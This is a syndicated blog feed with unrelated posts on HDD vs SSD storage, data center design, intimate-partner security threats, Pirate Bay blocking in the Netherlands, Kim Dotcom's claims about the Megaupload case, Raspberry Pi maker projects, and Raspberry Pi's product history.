Data centers are an entirely different kettle of fish. The primary concerns for data center storage are reliability, storage density, and cost. While SSDs are strong in the first two areas, it’s the third where they are not yet competitive. At Backblaze we adopt higher density HDDs as they become available — we’re currently using both 10TB and 12TB drives (among other capacities) in our data centers. Higher density drives provide greater storage density per Storage Pod and Vault and reduce our overhead cost through less required maintenance and lower total power requirements. Comparable SSDs in those sizes would cost roughly $1,000 per terabyte, considerably higher than the corresponding HDD. Simply put, SSDs are not yet in the price range to make their use economical for the benefits they provide, which is the reason why we expect to be using HDDs as our primary storage media for the foreseeable future.

What Are HDDs?

HDDs have been around for over 60 years, since IBM introduced them in 1956. The first disk drive was the size of a car, stored a mere 3.75 megabytes, and cost $300,000 in today’s dollars.

IBM 350 Disk Storage System — 3.75MB in 1956

The 350 Disk Storage System was a major component of the IBM 305 RAMAC (Random Access Method of Accounting and Control) system, which was introduced in September 1956. It consisted of 40 platters and a dual read/write head on a single arm that moved up and down the stack of magnetic disk platters.

The basic mechanism of an HDD remains unchanged since then, though it has undergone continual refinement. An HDD uses magnetism to store data on a rotating platter. A read/write head is affixed to an arm that floats above the spinning platter reading and writing data. The faster the platter spins, the faster an HDD can perform. Typical laptop drives today spin at either 5400 RPM (revolutions per minute) or 7200 RPM, though some server-based platters spin at even higher speeds.

Exploded drawing of a hard drive

The platters inside the drives are coated with a magnetically sensitive film consisting of tiny magnetic grains. Data is recorded when a magnetic write-head flies just above the spinning disk; the write head rapidly flips the magnetization of one magnetic region of grains so that its magnetic pole points up or down, to encode a 1 or a 0 in binary code. If all this sounds like an HDD is vulnerable to shocks and vibration, you’d be right. They also are vulnerable to magnets, which is one way to destroy the data on an HDD if you’re getting rid of it.

The major advantage of an HDD is that it can store lots of data cheaply. One and two terabyte (1,024 and 2,048 gigabytes) hard drives are not unusual for a laptop these days, and 10TB and 12TB drives are now available for desktops and servers. Densities and rotation speeds continue to grow. However, if you compare the cost of common HDDs vs SSDs for sale online, the SSDs are roughly 3-5x the cost per gigabyte. So if you want cheap storage and lots of it, using a standard hard drive is definitely the more economical way to go.

What are the best uses for HDDs?

  • Disk arrays (NAS, RAID, etc.) where high capacity is needed
  • Desktops when low cost is priority
  • Media storage (photos, videos, audio not currently being worked on)
  • Drives with an extreme number of reads and writes

What Are SSDs?

SSDs go back almost as far as HDDs, with the first semiconductor storage device compatible with a hard drive interface introduced in 1978, the StorageTek 4305.

Storage Technology 4305 SSD

The StorageTek was an SSD aimed at the IBM mainframe compatible market. The STC 4305 was seven times faster than IBM’s popular 2305 HDD system (and also about half the price). It consisted of a cabinet full of charge-coupled devices and cost $400,000 for 45MB capacity with throughput speeds up to 1.5 MB/sec.

SSDs are based on a type of non-volatile memory called NAND (named for the Boolean operator “NOT AND,” and one of two main types of flash memory). Flash memory stores data in individual memory cells, which are made of floating-gate transistors. Though they are semiconductor-based memory, they retain their information when no power is applied to them — a feature that’s obviously a necessity for permanent data storage.

Samsung SSD 850 Pro

Compared to an HDD, SSDs have higher data-transfer rates, higher areal storage density, better reliability, and much lower latency and access times. For most users, it’s the speed of an SSD that primarily attracts them. When discussing the speed of drives, what we are referring to is the speed at which they can read and write data.

For HDDs, the speed at which the platters spin strongly determines the read/write times. When data on an HDD is accessed, the read/write head must physically move to the location where the data was encoded on a magnetic section on the platter. If the file being read was written sequentially to the disk, it will be read quickly. As more data is written to the disk, however, it’s likely that the file will be written across multiple sections, resulting in fragmentation of the data. Fragmented data takes longer to read with an HDD as the read head has to move to different areas of the platter(s) to completely read all the data requested.

Because SSDs have no moving parts, they can operate at speeds far above those of a typical HDD. Fragmentation is not an issue for SSDs. Files can be written anywhere with little impact on read/write times, resulting in read times far faster than any HDD, regardless of fragmentation.

Samsung SSD 850 Pro (back)

Due to the way data is written and read to the drive, however, SSD cells can wear out over time. SSD cells push electrons through a gate to set its state. This process wears on the cell and over time reduces its performance until the SSD wears out. This effect takes a long time and SSDs have mechanisms to minimize this effect, such as the TRIM command. Flash memory writes an entire block of storage no matter how few pages within the block are updated. This requires reading and caching the existing data, erasing the block and rewriting the block. If an empty block is available, a write operation is much faster. The TRIM command, which must be supported in both the OS and the SSD, enables the OS to inform the drive which blocks are no longer needed. It allows the drive to erase the blocks ahead of time in order to make empty blocks available for subsequent writes.

The effect of repeated reading and erasing on an SSD is cumulative and an SSD can slow down and even display errors with age. It’s more likely, however, that the system using the SSD will be discarded for obsolescence before the SSD begins to display read/write errors. Hard drives eventually wear out from constant use as well, since they use physical recording methods, so most users won’t base their selection of an HDD or SSD drive based on expected longevity.

SSD internals

SSD circuit board

Overall, SSDs are considered far more durable than HDDs due to a lack of mechanical parts. The moving mechanisms within an HDD are susceptible to not only wear and tear over time, but to damage due to movement or forceful contact. If one were to drop a laptop with an HDD, there is a high likelihood that all those moving parts will collide, resulting in potential data loss and even destructive physical damage that could kill the HDD outright. SSDs have no moving parts so, while they hold the risk of a potentially shorter life span due to high use, they can survive the rigors we impose upon our portable devices and laptops.

What are the best uses for SSDs?

  • Notebooks and laptops, where performance, light weight, areal storage density, resistance to shock, and general ruggedness are desirable
  • Boot drives holding operating system and applications, which will speed up booting and application launching
  • Working files (media that is being edited: photos, video, audio, etc.)
  • Swap drives where SSD will speed up disk paging
  • Cache drives
  • Database servers
  • Revitalizing an older computer. If you’ve got a computer that seems slow to start up and slow to load applications and files, updating the boot drive with an SSD could make it seem, if not new, at least as if it just came back refreshed from spending some time on the beach.

Stay Tuned for Part 2 of HDD vs SSD

That’s it for part 1. In our second part we’ll take a deeper look at the differences between HDDs and SSDs, how both HDD and SSD technologies are evolving, and how Backblaze takes advantage of SSDs in our operations and data centers.

Here’s a tip on finding all the posts tagged with SSD on our blog. Just follow https://www.backblaze.com/blog/tag/ssd/.

Don’t miss future posts on HDDs, SSDs, and other topics, including hard drive stats, cloud storage, and tips and tricks for backing up to the cloud. Use the Join button above to receive notification of future posts on our blog.


Intimate Partner Threat

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/03/intimate_partne.html

Princeton’s Karen Levy has a good article on computer security and the intimate partner threat:

When you learn that your privacy has been compromised, the common advice is to prevent additional access — delete your insecure account, open a new one, change your password. This advice is such standard protocol for personal security that it’s almost a no-brainer. But in abusive romantic relationships, disconnection can be extremely fraught. For one, it can put the victim at risk of physical harm: If abusers expect digital access and that access is suddenly closed off, it can lead them to become more violent or intrusive in other ways. It may seem cathartic to delete abusive material, like alarming text messages — but if you don’t preserve that kind of evidence, it can make prosecution more difficult. And closing some kinds of accounts, like social networks, to hide from a determined abuser can cut off social support that survivors desperately need. In some cases, maintaining a digital connection to the abuser may even be legally required (for instance, if the abuser and survivor share joint custody of children).

Threats from intimate partners also change the nature of what it means to be authenticated online. In most contexts, access credentials­ — like passwords and security questions — are intended to insulate your accounts against access from an adversary. But those mechanisms are often completely ineffective for security in intimate contexts: The abuser can compel disclosure of your password through threats of violence and has access to your devices because you’re in the same physical space. In many cases, the abuser might even own your phone — or might have access to your communications data because you share a family plan. Things like security questions are unlikely to be effective tools for protecting your security, because the abuser knows or can guess at intimate details about your life — where you were born, what your first job was, the name of your pet.

The Challenges of Opening a Data Center — Part 2

Post Syndicated from Roderick Bauer original https://www.backblaze.com/blog/factors-for-choosing-data-center/

Rows of storage pods in a data center

This is part two of a series on the factors that an organization needs to consider when opening a data center and the challenges that must be met in the process.

In Part 1 of this series, we looked at the different types of data centers, the importance of location in planning a data center, data center certification, and the single most expensive factor in running a data center, power.

In Part 2, we continue to look at factors that need to be considered both by those interested in a dedicated data center and those seeking to colocate in an existing center.

Power (continued from Part 1)

In part 1, we began our discussion of the power requirements of data centers.

As we discussed, redundancy and failover are chief requirements for data center power. A redundantly designed power supply system is also a necessity for maintenance, since it enables repairs to be performed on one network, for example, without having to turn off servers, databases, or electrical equipment.

Power Path

The common critical components of a data center’s power flow are:

  • Utility Supply
  • Generators
  • Transfer Switches
  • Distribution Panels
  • Uninterruptible Power Supplies (UPS)
  • PDUs

Utility Supply is the power that comes from one or more utility grids. While most of us consider the grid to be our primary power supply (hats off to those of you who manage to live off the grid), politics, economics, and distribution make utility supply power susceptible to outages, which is why data centers must have autonomous power available to maintain availability.

Generators are used to supply power when the utility supply is unavailable. They convert mechanical energy, usually from diesel or gas engines, into electrical energy.

Transfer Switches are used to transfer electric load from one source or electrical device to another, such as from one utility line to another, from a generator to a utility, or between generators. The transfer could be manually activated or automatic to ensure continuous electrical power.

Distribution Panels get the power where it needs to go, taking a power feed and dividing it into separate circuits to supply multiple loads.

A UPS, as we touched on earlier, ensures that continuous power is available even when the main power source isn’t. It often consists of batteries that can come online almost instantaneously when the current power ceases. The power from a UPS does not have to last a long time as it is considered an emergency measure until the main power source can be restored. Another function of the UPS is to filter and stabilize the power from the main power supply.

Data center UPSs

PDU stands for Power Distribution Unit; it is the device that distributes power to the individual pieces of equipment.


Network

After power, the networking connections to the data center are of prime importance. Can the data center obtain and maintain high-speed networking connections to the building? With networking, as with all aspects of a data center, availability is a primary consideration. Data center designers think of all possible ways service can be interrupted or lost, even briefly. Details such as the vulnerabilities in the route the network connections make from the core network (the backhaul) to the center, and where network connections enter and exit a building, must be taken into consideration in network and data center design.

Routers and switches are used to transport traffic between the servers in the data center and the core network. Just as with power, network redundancy is a prime factor in maintaining availability of data center services. Two or more upstream service providers are required to ensure that availability.

How fast a customer can transfer data to a data center is affected by: 1) the speed of the connections the data center has with the outside world, 2) the quality of the connections between the customer and the data center, and 3) the distance of the route from the customer to the data center. The longer the route and the greater the number of packets that must be transferred, the more significant a factor latency becomes in the data transfer. Latency is the delay before a transfer of data begins following an instruction for its transfer. Generally latency, not speed, will be the most significant factor in transferring data to and from a data center. Packets transferred using the TCP/IP protocol suite, the set of communications protocols used on the internet and similar computer networks, must be acknowledged when received (ACK’d), which requires a communications round trip for each packet. If the data is sent in larger packets, the number of ACKs required is reduced, so latency becomes a smaller factor in overall network communications speed.

Latency generally will be less significant for data storage transfers than for cloud computing. Optimizations such as multi-threading, which is used in Backblaze’s Cloud Backup service, will generally improve overall transfer throughput if sufficient bandwidth is available.
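
As a back-of-the-envelope illustration of why round-trip time matters so much: with a fixed amount of unacknowledged data allowed in flight (the TCP window), a single stream’s throughput is capped at roughly the window size divided by the round-trip time. The window sizes and round-trip times below are assumptions for illustration, not measurements of any particular connection.

# Rough throughput ceiling for a single TCP stream: window / round-trip time.
def max_throughput_mbps(window_bytes, rtt_ms):
    return (window_bytes * 8) / (rtt_ms / 1000.0) / 1_000_000

print(max_throughput_mbps(64 * 1024, 10))       # ~52 Mbps: 64 KB window, 10 ms RTT
print(max_throughput_mbps(64 * 1024, 100))      # ~5 Mbps: same window, 100 ms RTT
print(max_throughput_mbps(8 * 64 * 1024, 100))  # ~42 Mbps: eight such streams in parallel

This is why multi-threaded transfers help on high-latency paths: several streams together keep more data in flight than any single window allows.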

Those interested in testing the overall speed and latency of their connection to Backblaze’s data centers can use the Check Your Bandwidth tool on our website.
Data center telecommunications equipment

Data center under floor cable runs


Computer, networking, and power generation equipment generates heat, and a number of solutions are employed to rid a data center of that heat. The location and climate of the data center are of great importance to the designer because climatic conditions dictate, to a large degree, which cooling technologies should be deployed, which in turn affects the power used and the cost of that power. The power and cost required to cool a data center in a warm, humid climate differ greatly from those for one in a cool, dry climate. Innovation is strong in this area, and many new approaches to efficient and cost-effective cooling are used in the latest data centers.

Switch’s uninterruptible, multi-system, HVAC Data Center Cooling Units

There are three primary ways data center cooling can be achieved:

Room Cooling cools the entire operating area of the data center. This method can be suitable for small data centers, but becomes more difficult and inefficient as IT equipment density and center size increase.

Row Cooling concentrates on cooling a data center on a row by row basis. In its simplest form, hot aisle/cold aisle data center design involves lining up server racks in alternating rows with cold air intakes facing one way and hot air exhausts facing the other. The rows composed of rack fronts are called cold aisles. Typically, cold aisles face air conditioner output ducts. The rows the heated exhausts pour into are called hot aisles. Typically, hot aisles face air conditioner return ducts.

Rack Cooling tackles cooling on a rack by rack basis. Air-conditioning units are dedicated to specific racks. This approach allows for maximum densities to be deployed per rack. This works best in data centers with fully loaded racks, otherwise there would be too much cooling capacity, and the air-conditioning losses alone could exceed the total IT load.


Data centers are high-security facilities, as they house business, government, and other data containing personal, financial, and other sensitive information about businesses and individuals.

Here are the key physical-security considerations when opening or colocating in a data center:

Layered Security Zones. Systems and processes are deployed to allow only authorized personnel in certain areas of the data center. Examples include keycard access, alarm systems, mantraps, secure doors, and staffed checkpoints.

Physical Barriers. Fencing, reinforced walls, and other physical barriers are used to protect facilities. In a colocation facility, one customer’s racks and servers are often inaccessible to other customers colocating in the same data center.

Backblaze racks secured in the data center

Monitoring Systems. Advanced surveillance technology monitors and records activity on approaching driveways, building entrances, exits, loading areas, and equipment areas. These systems can also be used to monitor and detect fire and water emergencies, providing early detection and notification before significant damage results.

Top-tier providers evaluate their data center security and facilities on an ongoing basis. Technology becomes outdated quickly, so providers must stay on top of new approaches and technologies in order to protect valuable IT assets.

Passing into the high-security areas of a data center requires going through a security checkpoint where credentials are verified.

The gauntlet of cameras and steel bars one must pass before entering this data center

Facilities and Services

Data center colocation providers often differentiate themselves by offering value-added services. In addition to the required space, power, cooling, connectivity and security capabilities, the best solutions provide several on-site amenities. These accommodations include offices and workstations, conference rooms, and access to phones, copy machines, and office equipment.

Additional features may consist of kitchen facilities, break rooms and relaxation lounges, storage facilities for client equipment, and secure loading docks and freight elevators.

Moving Into a Data Center

Moving into a data center is a major job for any organization. We wrote a post last year, Desert To Data in 7 Days — Our New Phoenix Data Center, about what it was like to move into our new data center in Phoenix, Arizona.

Visiting a Data Center

Our Director of Product Marketing Andy Klein wrote a popular post last year on what it’s like to visit a data center called A Day in the Life of a Data Center.

Would You Like to Know More About the Challenges of Opening and Running a Data Center?

That’s it for part 2 of this series. If readers are interested, we could write a post about some of the new technologies and trends affecting data center design and use. Please let us know in the comments.

Here’s a tip on finding all the posts tagged with data center on our blog. Just follow https://www.backblaze.com/blog/tag/data-center/.

Don’t miss future posts on data centers and other topics, including hard drive stats, cloud storage, and tips and tricks for backing up to the cloud. Use the Join button above to receive notification of future posts on our blog.

The post The Challenges of Opening a Data Center — Part 2 appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Petoi: a Pi-powered kitty cat

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/petoi-a-pi-powered-kitty-cat/

A robot pet is the dream of many a child, thanks to creatures such as K9, Doctor Who’s trusted companion, and the Tamagotchi, bleeping nightmare of parents worldwide. But both of these pale in comparison (sorry, K9) to Petoi, the walking, meowing, live-streaming cat from maker Rongzhong Li.

Petoi: OpenCat Demo

Mentioned on IEEE Spectrum: https://spectrum.ieee.org/automaton/robotics/humanoids/video-friday-boston-dynamics-spotmini-opencat-robot-engineered-arts-mesmer-uncanny-valley More reads on Hackster: https://www.hackster.io/petoi/opencat-845129 Youku: http://v.youku.com/v_show/id_XMzQxMzA1NjM0OA==.html?spm=a2h3j.8428770.3416059.1 We are developing programmable and highly maneuverable quadruped robots for STEM education and AI-enhanced services. Its compact and bionic design makes it the only affordable consumer robot that mimics various mammal gaits and reacts to its surroundings.


Not only have cats conquered the internet, they also have a paw firmly in the door of many makerspaces and spare rooms — rooms such as the one belonging to Petoi’s owner/maker, Rongzhong Li, who has been working on this feline creation since he bought his first Raspberry Pi.

Petoi in its current state – apple for scale in lieu of banana

Petoi is just like any other housecat: it walks, it plays, its ribcage doubles as a digital xylophone — but what makes Petoi so special is Li’s use of the project as a platform for study.

I bought my first Raspberry Pi in June 2016 to learn coding hardware. This robot Petoi served as a playground for learning all the components in a regular Raspberry Pi beginner kit. I started with craft sticks, then switched to 3D-printed frames for optimized performance and morphology.

Various iterations of Petoi have housed various bits of tech, 3D-printed parts, and software, so while it’s impossible to list the exact ingredients you’d need to create your own version of Petoi, a few components remain at its core.

An early version of Petoi, housed inside a plastic toy helicopter frame

A Raspberry Pi lives within Petoi and acts as its brain, relaying commands to an Arduino that controls movement. Li explains:

The Pi takes no responsibility for controlling detailed limb movements. It focuses on more serious questions, such as “Who am I? Where do I come from? Where am I going?” It generates mind and sends string commands to the Arduino slave.
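
A minimal sketch of that division of labor (our illustration; the serial device, baud rate, and command strings are hypothetical, not Petoi’s actual protocol):

    import serial  # pyserial
    import time

    # The Pi does the high-level "thinking" and sends short string commands;
    # the Arduino turns them into detailed limb movements.
    with serial.Serial("/dev/ttyUSB0", baudrate=115200, timeout=1) as arduino:
        time.sleep(2)               # the Arduino resets when the port opens
        arduino.write(b"walk F\n")  # hypothetical "walk forward" command
        print(arduino.readline())   # read back any acknowledgment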

Li is currently working on two functional prototypes: a mini version for STEM education, and a larger version for use within the field of AI research.

A cat and a robot cat walking upstairs

You can read more about the project, including details on the various interactions of Petoi, on the hackster.io project page.

Not quite ready to commit to a fully grown robot pet for your home? Why not code your own pixel pet with our free learning resource? And while you’re looking through our projects, check out our other pet-themed tutorials such as the Hamster party cam, the Infrared bird box, and the Cat meme generator.

The post Petoi: a Pi-powered kitty cat appeared first on Raspberry Pi.

The Pirate Bay’s Domain Suffers “40% Traffic Drop” After Dutch Blocking

Post Syndicated from Andy original https://torrentfreak.com/the-pirate-bays-domain-suffers-40-traffic-drop-after-dutch-blocking-180302/

Over the past several years, Dutch anti-piracy outfit BREIN has been engaged in continuous legal action against local ISPs Ziggo and XS4All. BREIN felt they should block The Pirate Bay to reduce copyright infringement but the ISPs felt blocking was disproportionate.

The case went all the way to the Supreme Court and then to the EU Court of Justice for clarification. Last June, the ECJ ruled that as a platform effectively communicating copyright works to the public, The Pirate Bay can indeed be blocked by ISPs.

The case will go back to the Supreme Court, which is likely to give permanent blocking the go-ahead. However, BREIN wanted a blocking decision more quickly and got one last September, when The Hague Court of Appeal told Ziggo and XS4All to block The Pirate Bay pending a Supreme Court decision.

With The Pirate Bay blocked by the ISPs from September last year, BREIN has been monitoring the effect of the blockade on traffic to the site. In a statement, the anti-piracy outfit suggests that blocking is doing its job.

“Monitoring by ComScore shows that the number of unique visitors to thepiratebay.org from the Netherlands has dropped by more than 40% between September 2017 and December 2017, after internet providers Ziggo and XS4ALL were ordered by the court to deny access to the site on the basis of BREIN’s claim,” BREIN writes.

Ziggo is the largest cable operator in the Netherlands and XS4All one of the longest standing, so it comes as no surprise to learn that traffic to The Pirate Bay’s main domain has been hit. However, since the site can be accessed in numerous different indirect ways, including via proxies, mirrors and VPNs, to name a few, does BREIN’s claim that “blocking works” still hold water?

According to BREIN director Tim Kuik, yes it does.

“We also are blocking many proxies and mirrors. There is a whole list of them which also changes. New ones are added and others may be deleted,” Kuik informs TF.

“The monitoring compares like with like and shows a trend that correlates with other sources. I think this trend holds true for all blocked sites.”

So, to be clear, the 40% does not represent a drop in Dutch traffic to The Pirate Bay’s site and/or content overall, it only represents traffic which goes directly to the specific thepiratebay.org domain. Anyone circumventing the blockade isn’t counted.

Of course, that’s not to say that the overall traffic numbers from the Netherlands aren’t down as well, but there are no public figures to prove that one way or another. The precise impact of proxies and mirrors is also unclear but Kuik thinks that the blockades themselves send a message.

“Bypassing a blockade requires users to take action to illegally download and it is now clear that they are committing a criminal offense and most people do not want that,” he says.

VPNs are undoubtedly an effective unblocking solution for some but Kuik doesn’t believe they represent a big threat, currently at least.

“We think VPN use is not common under the average user, that is more something for the hardcore and not all of those will use it for access to illegal sources,” he informs TF.

While BREIN is fairly relaxed about VPNs for now, the group suggests it could take action if they begin to pose a risk to the site-blocking regime they’ve fought so hard for.

“If it becomes problematic, blocking could in principle also be demanded from VPN services,” Kuik warns.

Given the 40% figure and the caveats above, it is likely that direct traffic to The Pirate Bay’s domain will fall again in the months to come. In mid-January, a Dutch court ruled that local Internet providers KPN, Tele2, T-Mobile, Zeelandnet and CAIW must follow Ziggo and XS4All in blocking The Pirate Bay.

There’s no doubt that blocking has at least some effect on direct traffic to pirate sites and it’s clear that entertainment industry groups feel it’s essential as part of a bigger anti-piracy toolkit.

Thus far, however, pirates have proven to be extremely resilient so the Netherlands will probably need further action against a much broader range of sites if blocking is to have any meaningful effect.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Simulate sand with Adafruit’s newest project

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/simulate-sand-with-adafruits-newest-project/

The Ruiz brothers at Adafruit have used Phillip Burgess’s PixieDust code to turn a 64×64 LED Matrix and a Raspberry Pi Zero into an awesome sand toy that refuses to defy the laws of gravity. Here’s how to make your own.

BIG LED Sand Toy – Raspberry Pi RGB LED Matrix

Simulated LED sand physics! These LEDs interact with motion and look like they’re affected by gravity. An Adafruit LED matrix displays the LEDs as little grains of sand, which are driven by sampling an accelerometer with a Raspberry Pi Zero!

Obey gravity

As the latest addition to their online learning system, Adafruit have produced the BIG LED Sand Toy, or as I like to call it, Have you seen this awesome thing Adafruit have made?

Adafruit Sand Toy Raspberry Pi

The build uses a Raspberry Pi Zero, a 64×64 LED matrix, the Adafruit RGB Matrix Bonnet, 3D-printed parts, and a few smaller peripherals. Find the entire tutorial, including downloadable STL files, on their website.

How does it work?

Alongside the aforementioned ingredients, the project utilises the Adafruit LIS3DH Triple-Axis Accelerometer. This sensor is packed with features, and it allows the Raspberry Pi to control the virtual sand depending on how the toy is moved.
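
To give a feel for what the Pi is working with, here’s a minimal read loop using Adafruit’s published CircuitPython driver for the LIS3DH (a sketch, not the project’s actual code; your wiring and I2C address may differ):

    import time
    import board
    import busio
    import adafruit_lis3dh

    # LIS3DH over I2C; 0x18 is the default address on Adafruit's breakout
    i2c = busio.I2C(board.SCL, board.SDA)
    accel = adafruit_lis3dh.LIS3DH_I2C(i2c, address=0x18)

    while True:
        x, y, z = accel.acceleration  # metres per second squared
        print(f"x={x:.2f} y={y:.2f} z={z:.2f}")
        time.sleep(0.1)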

Adafruit Sand Toy Raspberry Pi

The Ruiz brothers inserted an SD card loaded with Raspbian Lite into the Raspberry Pi Zero, installed the LED Matrix driver, cloned the Adafruit_PixieDust library, and then just executed the code. They created some preset modes, but once you’re comfortable with the project code, you’ll be able to add your own take on the project.

Accelerometers and Raspberry Pi

This isn’t the first time a Raspberry Pi has met an accelerometer: the two Raspberry Pis aboard the International Space Station for the Astro Pi mission both have accelerometers thanks to their Sense HATs.

Comprised of a bundle of sensors, an LED matrix, and a five-point joystick, the Sense HAT is a great tool for exploring your surroundings with the Raspberry Pi, as well as for using your surroundings to control the Pi. You can find a whole variety of Sense HAT–based projects and tutorials on our website.
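
Reading the Sense HAT’s accelerometer takes only a few lines with the standard sense_hat library (a quick sketch; swap in the sense_emu module if you’re using the emulator mentioned below):

    from sense_hat import SenseHat

    sense = SenseHat()
    accel = sense.get_accelerometer_raw()  # dict of x, y, z values in g
    print(f"x={accel['x']:.2f} y={accel['y']:.2f} z={accel['z']:.2f}")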

Raspberry Pi Sense HAT Slug free resource

And if you’d like to try out the Sense HAT, including its onboard accelerometer, without purchasing one, head over to our online emulator, or use the emulator preinstalled on Raspbian.

The post Simulate sand with Adafruit’s newest project appeared first on Raspberry Pi.

Russians Hacked the Olympics

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/03/russians_hacked.html

Two weeks ago, I blogged about the myriad of hacking threats against the Olympics. Last week, the Washington Post reported that Russia hacked the Olympics network and tried to cast the blame on North Korea.

Of course, the evidence is classified, so there’s no way to verify this claim. And while the article speculates that the hacks were a retaliation for Russia being banned due to doping, that doesn’t ring true to me. If they tried to blame North Korea, it’s more likely that they’re trying to disrupt something between North Korea, South Korea, and the US. But I don’t know.

Dotcom: Obama Admitted “Mistakes Were Made” in Megaupload Case

Post Syndicated from Andy original https://torrentfreak.com/dotcom-obama-admitted-mistakes-were-made-in-megaupload-case-180301/

When Megaupload was forcefully shut down in 2012, it initially appeared like ‘just’ another wave of copyright enforcement action by US authorities.

When additional details began to filter through, the reality of what had happened was nothing short of extraordinary.

Not only were large numbers of Megaupload servers and millions of dollars seized, but Kim Dotcom’s home in New Zealand was subjected to a military-style raid comprised of helicopters and dozens of heavily armed special tactics police. The whole thing was monitored live by the FBI.

Few people who watched the events of that now-infamous January day unfold came to the conclusion this was a routine copyright-infringement case. According to Kim Dotcom, whose life had just been turned upside down, something of this scale must’ve filtered down from the very top of the US government. It was hard to disagree.

At the time, Dotcom told TorrentFreak that then-Vice President Joe Biden directed attorney Neil MacBride to target the cloud storage site and ever since the Megaupload founder has leveled increasingly serious allegations at officials of the former government of Barack Obama.

For example, Dotcom says that since the US would have difficulty gaining access to him in his former home of Hong Kong, the government of New Zealand was persuaded to welcome him in, knowing they would eventually turn him over to the United States. More recently he’s been turning up the pressure again, such as a tweet on February 20th which cast more light on that process.

“Joe Biden had a White House meeting with an ‘extradition expert’ who worked for Hong Kong police and a handful of Hollywood executives to discuss my case. A week prior to this meeting Neil MacBride hand-delivered his action plan to Biden’s chief of staff, also at the White House,” Dotcom wrote.

But this claim is just the tip of an extremely large iceberg that’s involved illegal spying on Dotcom in New Zealand and a dizzying array of legal battles that are set to go on for years to come. But perhaps of most interest now is that rather than wilting away under the pressure, Dotcom appears to be just warming up.

A few hours ago Dotcom commented on an article published in The Hill which revealed that Barack Obama will visit New Zealand in March, possibly to celebrate the opening of Air New Zealand’s new route to the U.S.

Rather than expressing disappointment, the Megaupload founder seemed pleased that the former president would be touching down next month.

“Great. I’ll have a Court subpoena waiting for him in New Zealand,” Dotcom wrote.

But that was just a mere hors d’oeuvre; the main course was yet to come. And come it did.

“A wealthy Asian Megaupload shareholder hired a friend of the Obamas to enquire about our case. This person was recommended by a member of the Chinese politburo ‘if you want to get to Obama directly’. We did,” Dotcom revealed.

Dotcom says he’ll release a transcript detailing what Obama told his friend on March 21 when Obama arrives in town but in the meantime, he offered another little taster.

“Mistakes were made. It hasn’t gone well,” Obama reportedly told the person reporting back to Megaupload. “It’s a problem. I’ll see to it after the election.”

Of course, Obama’s position after the election was much different to what had gone before, but that didn’t stop Dotcom’s associates infiltrating the process aimed at keeping the Democrats in power.

“Our friendly Obama contact smuggled an @EFF lawyer into a re-election fundraiser hosted by former Vice President Joe Biden,” he revealed.

“When Biden was asked about the Megaupload case he bragged that it was his case and that he ‘took care of it’,” which is what Dotcom has been claiming all along.

On March 21, when Obama lands in New Zealand, Dotcom says he’ll be waiting.

“I’m looking forward to @BarackObama providing some insight into the political dimension of the Megaupload case when he arrives in the New Zealand jurisdiction,” he teased.

Better get the popcorn ready….

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Happy birthday to us!

Post Syndicated from Eben Upton original https://www.raspberrypi.org/blog/happy-birthday-2018/

The eagle-eyed among you may have noticed that today is 28 February, which is as close as you’re going to get to our sixth birthday, given that we launched on a leap day. For the last three years, we’ve launched products on or around our birthday: Raspberry Pi 2 in 2015; Raspberry Pi 3 in 2016; and Raspberry Pi Zero W in 2017. But today is a snow day here at Pi Towers, so rather than launching something, we’re taking a photo tour of the last six years of Raspberry Pi products before we don our party hats for the Raspberry Jam Big Birthday Weekend this Saturday and Sunday.


Before there was Raspberry Pi, there was the Broadcom BCM2763 ‘micro DB’, designed, as it happens, by our very own Roger Thornton. This was the first thing we demoed as a Raspberry Pi in May 2011, shown here running an ARMv6 build of Ubuntu 9.04.

BCM2763 micro DB

Ubuntu on Raspberry Pi, 2011-style

A few months later, along came the first batch of 50 “alpha boards”, designed for us by Broadcom. I used to have a spreadsheet that told me where in the world each one of these lived. These are the first “real” Raspberry Pis, built around the BCM2835 application processor and LAN9512 USB hub and Ethernet adapter; remarkably, a software image taken from the download page today will still run on them.

Raspberry Pi alpha board, top view

We shot some great demos with this board, including this video of Quake III:

Raspberry Pi – Quake 3 demo

A little something for the weekend: here’s Eben showing the Raspberry Pi running Quake 3, and chatting a bit about the performance of the board. Thanks to Rob Bishop and Dave Emett for getting the demo running.

Pete spent the second half of 2011 turning the alpha board into a shippable product, and just before Christmas we produced the first 20 “beta boards”, 10 of which were sold at auction, raising over £10000 for the Foundation.

The beginnings of a Bramble

Beta boards on parade

Here’s Dom, demoing both the board and his excellent taste in movie trailers:

Raspberry Pi Beta Board Bring up



Rather to Pete’s surprise, I took his beta board design (with a manually-added polygon in the Gerbers taking the place of Paul Grant’s infamous red wire), and ordered 2000 units from Egoman in China. After a few hiccups, units started to arrive in Cambridge, and on 29 February 2012, Raspberry Pi went on sale for the first time via our partners element14 and RS Components.

Pallet of pis

The first 2000 Raspberry Pis

Unboxing continues

The first Raspberry Pi from the first box from the first pallet

We took over 100000 orders on the first day: something of a shock for an organisation that had imagined in its wildest dreams that it might see lifetime sales of 10000 units. Some people who ordered that day had to wait until the summer to finally receive their units.


Even as we struggled to catch up with demand, we were working on ways to improve the design. We quickly replaced the USB polyfuses in the top right-hand corner of the board with zero-ohm links to reduce IR drop. If you have a board with polyfuses, it’s a real limited edition; even more so if it also has Hynix memory. Pete’s “rev 2” design made this change permanent, tweaked the GPIO pin-out, and added one much-requested feature: mounting holes.

Revision 1 versus revision 2

If you look carefully, you’ll notice something else about the revision 2 board: it’s made in the UK. 2012 marked the start of our relationship with the Sony UK Technology Centre in Pencoed, South Wales. In the five years since, they’ve built every product we offer, including more than 12 million “big” Raspberry Pis and more than one million Zeros.

Celebrating 500,000 Welsh units, back when that seemed like a lot

Economies of scale, and the decline in the price of SDRAM, allowed us to double the memory capacity of the Model B to 512MB in the autumn of 2012. And as supply of Model B finally caught up with demand, we were able to launch the Model A, delivering on our original promise of a $25 computer.

A UK-built Raspberry Pi Model A

In 2014, James took all the lessons we’d learned from two-and-a-bit years in the market, and designed the Model B+, and its baby brother the Model A+. The Model B+ established the form factor for all our future products, with a 40-pin extended GPIO connector, four USB ports, and four mounting holes.

The Raspberry Pi 1 Model B+ — entering the era of proper product photography with a bang.

New toys

